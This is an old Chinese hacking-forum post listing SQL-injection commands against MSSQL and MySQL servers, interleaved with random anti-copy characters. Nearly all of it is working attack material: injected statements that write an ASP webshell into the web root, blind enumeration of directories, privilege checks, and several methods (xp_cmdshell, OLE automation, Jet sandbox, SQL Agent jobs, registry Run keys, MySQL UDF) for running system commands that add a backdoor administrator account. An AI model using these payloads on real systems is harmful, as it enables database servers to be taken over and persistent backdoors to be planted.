找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2896|回复: 0
打印 上一主题 下一主题

mssql实用命令及导出一句话

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:49:59 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
MSSQL语句导出一句话木马
7 }8 f) Z; S7 H  @1 ^  \% I2 k+ l首先确定网站的WEB路径) N- Q( ?: @! v1 A
;create table pcguest(pc char(255));-- //建一个表用作插入一句话木马, Z9 f% c- G, N' G& ~( `
. H1 ^8 M' j* g' _1 N
;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');-- , [! ]1 Y& J* g. B: k
//将一句话木马插入表中
& j5 v: Y1 b9 p: o3 b& c
8 X% P- F' I) b8 G% R6 Q- T;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';-- & z5 i7 N/ U- E% S
//导出一个ASP文件
' |, \. u, J6 h8 E: n, W9 |' z' h5 q2 G9 b$ C8 K. q
6 p; Z& u5 g/ \" S. L% B
关于MSSQL列目录0 S6 R! z) R8 T" E& @
;CREATE TABLE pctest(subdirectory VARCHAR(100),depth VARCHAR(100),[file] VARCHAR(100)) //建一个新表
( G/ q9 V- e1 @, l4 P7 o' z% r4 vInsert pctest exec master..xp_dirtree "d:\app\",1,1 //用xp_dirtree列目录结果导入所建成的表
3 v# N* P  H- G( V. M7 t; C- {0 v
" {' l$ p+ X" n( Z/ u( M2 e( a: Fand (select Count(1) from [pctest]) between 0 and 99 //判断表中字段数来知道有几个文夹和目录" k7 A3 B6 K$ W& n- {# M6 N
, d' ^4 K4 F/ b" [1 a* }% N( r
And (Select Top 1 len(Cast([file] as varchar(8000))+subdirectory) From (Select Top 2 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 0 and 20 //猜解第二个字段
& Z% w+ Y, T0 D& g1 D
  v5 l! I) B' s  cAnd (Select Top 1 unicode(substring(Cast([file] as varchar(8000))+subdirectory,1,1)) From (Select Top 1 [subdirectory],[file] From pctest ORDER BY [file],[subdirectory]) D ORDER BY [file] desc , [subdirectory] desc) between 30 and 130 //逐一猜解字段名的每位字符
8 l4 ^5 u3 Q* T+ [! v2 u* f0 b; P1 G9 _+ e6 D4 M* ?$ Y1 \

0 y+ T5 U) [2 `8 p数据库版本和权限查看
, ]5 z+ B! v; i- q# |and 1=(select @@VERSION) //查看详细的数据库信息.# Z1 A! {* s. R& n- {
and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));-- //查看权限是不是SA/ i# r% }0 c% p& a, ~- B. G& D
and 1=(SELECT IS_MEMBER('db_owner'));-- //查看权限是不是DB_ONWER
# |; P6 [6 Q1 @
+ o$ Z9 S& I- i6 b& x
; F. U- x$ B$ I  v: a; l* _# x1.利用xp_cmdshell执行命令' M7 C  L# _$ ^- B0 t# y& F5 M
exec master..xp_cmdshell 'net user rfire 123456 /add'
, }3 ?8 p4 O( b5 J$ \exec master..xp_cmdshell 'net localgroup administrators rfire /add': |0 q  R, ?6 X: O8 k9 V/ Y" B* s% M, K

  R1 n3 H2 ^! V& H# j; T1 B8 q恢复xp_cmdshell存储过程
0 m% f' Y4 o$ x, A, q" y- bExec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
1 I! a3 N& Q% e; d2 f) `6 s. b2 v2 Q3 `$ S; b
+ Q  I5 |" E; L5 a# _& t* F
2.利用SP_OAcreate和SP_OAMETHOD执行命令) L3 P! U- t) w5 l7 V7 {, a
在wscript.shell组件存在的情况下以及xp_cmdshell和xplog70.dll都被删除的情况下
6 D( I- Y6 P  g0 S( i9 ~DECLARE @shell INT //建立一个@shell实体
. k1 }4 z! G6 \4 wEXEC SP_OAcreate 'wscript.shell',@shell out //创建OLE对象的实例: N! r  p( p1 F  }- S9 E
EXEC SP_OAMETHOD @shell,'run',null,'net user rfire 123456 /add' //调用@shell这个实例
3 O( x, ^* L3 A: V  c) E( b/ N- v% O, C8 k

0 r5 d& Q2 S9 O* u) t6 H3.利用沙盒模式  f; {2 V/ C3 h9 u# \
先利用xp_regwrite(前提是要求xp_regwrite存在)改注册表,然后用OpenRowSet访问系统自身mdb文件,然后执行SQL语句。
. g+ K3 D7 K/ c: ?+ h0 \开启沙盒模式:
% b) r1 h& Y. Q* e% X) QEXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engine','SandBoxMode','REG_DWORD',0
$ Q6 P0 O8 b. `; l2 W0 f, G( l5 ^% r) E, E4 G# F
执行命令:
: |. g2 e) y9 @! A( gSelect * From OpenRowSet('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','select shell("net user rfire 123456 /add")');
, F* O2 }7 p7 X1 I6 h) j3 m+ k* e# b8 x+ S+ f

' `. ?3 O' Q; N1 C4.利用SQL代理执行命令
6 v7 n% K* d& G- ?0 v6 bEXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT' //使用xp_servicecontrol启动SQLSERVERAGENT服务
1 u$ j. M0 \1 q4 m5 D" K( k: u. G
执行命令:6 G9 A; N; W( D, o% y5 B
use msdb exec sp_delete_job null,'x' //进入msdb数据库,删除x作业防止出错% l; s2 x3 U9 p4 O% [
exec sp_add_job 'x'
$ m# |& q: w, yexec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user rfire 123456 /add' //添加作业  s7 t0 m6 E6 y& p3 U, C$ s
exec sp_add_jobserver Null,'x',@@servername exec sp_add_job 'x' //启动这个作业; U, T8 A) n& G1 R7 N1 A7 }) q9 x5 s% I
# m- L+ X2 k4 e  [; U' j' _
: l3 w+ g+ p0 I; x! z( Z$ n
5.利用注册表项执行命令(用xp_regwrite将执行命令写入启动项)
; H5 v/ a) e: [; O2 IEXEC master.dbo.xp_regwrite 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run\','shell'.'REG_SZ','C:\windows\system32\cmd.exe /c net user rfire 123456 /add'8 f4 }9 J- @3 m; w

# u  F5 Y, z0 \* W$ Z8 ^1 O+ M& l: j8 U8 m0 L
6.MYSQL的命令执行
  f6 O% ~! j# I7 u( D6 r) x3 ]MYSQL的UDF自定义函数提权(要求账号拥有insert和delete权限)  K9 b# d. V, n% v, C2 c# U
首先要在su.php下导出c:\windows\udf.dll
3 A9 e3 ^7 h5 B4 Z* n! z/ ]导出后执行创建自定义函数命令:
( V" C4 ]2 t$ GCreate Function cmdshell returns string soname 'udf.dll'# M. \/ R3 M! B& ]+ q9 i
执行命令
! G/ H1 N: K3 H  H  r5 oselect cmdshell('net user rfire 123456 /add')
2 }" k; ]' q0 k/ |5 ~9 J执行后删除函数 drop function cmdshell
% @" O4 e" I" ^/ j: L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表